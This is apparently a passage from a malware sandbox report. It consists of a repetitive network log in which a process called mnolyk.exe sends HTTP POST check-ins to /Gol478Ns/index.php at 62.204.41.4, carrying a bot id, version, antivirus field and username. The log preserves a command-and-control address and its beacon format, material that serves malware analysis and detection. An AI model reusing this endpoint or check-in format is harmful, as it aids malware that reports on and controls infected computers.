                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:05.508915901 CET | 120 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      160 | 192.168.2.7 | 49855 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:43.680991888 CET | 275 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:43.744910002 CET | 275 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      161 | 192.168.2.7 | 49856 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:43.927942991 CET | 276 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:43.990817070 CET | 276 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      162 | 192.168.2.7 | 49857 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:44.177016020 CET | 277 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:44.241430998 CET | 277 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      163 | 192.168.2.7 | 49858 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:44.420397997 CET | 278 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:44.483531952 CET | 278 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      164 | 192.168.2.7 | 49859 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:44.659898996 CET | 279 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:44.728530884 CET | 279 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      165 | 192.168.2.7 | 49860 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:44.917310953 CET | 280 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:44.983091116 CET | 280 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      166 | 192.168.2.7 | 49861 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:45.159847975 CET | 281 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:45.223606110 CET | 281 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      167 | 192.168.2.7 | 49862 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:45.411367893 CET | 282 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:45.477965117 CET | 282 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      168 | 192.168.2.7 | 49863 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:45.653672934 CET | 283 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:45.718514919 CET | 283 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      169 | 192.168.2.7 | 49864 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:45.902188063 CET | 284 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:45.966905117 CET | 284 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      17 | 192.168.2.7 | 49711 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:05.695209980 CET | 121 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:05.759574890 CET | 121 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      170 | 192.168.2.7 | 49865 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:46.144260883 CET | 285 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:46.209244013 CET | 285 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      171 | 192.168.2.7 | 49866 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:46.384764910 CET | 286 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:46.450736046 CET | 286 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      172 | 192.168.2.7 | 49867 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:46.640724897 CET | 287 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:46.707313061 CET | 287 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      173 | 192.168.2.7 | 49868 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:46.881014109 CET | 288 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:46.946614027 CET | 288 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      174 | 192.168.2.7 | 49869 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:47.148730040 CET | 289 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:47.216913939 CET | 289 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      175 | 192.168.2.7 | 49870 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:47.398417950 CET | 290 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:47.464008093 CET | 290 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      176 | 192.168.2.7 | 49871 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:47.646610975 CET | 291 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:47.711477995 CET | 291 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
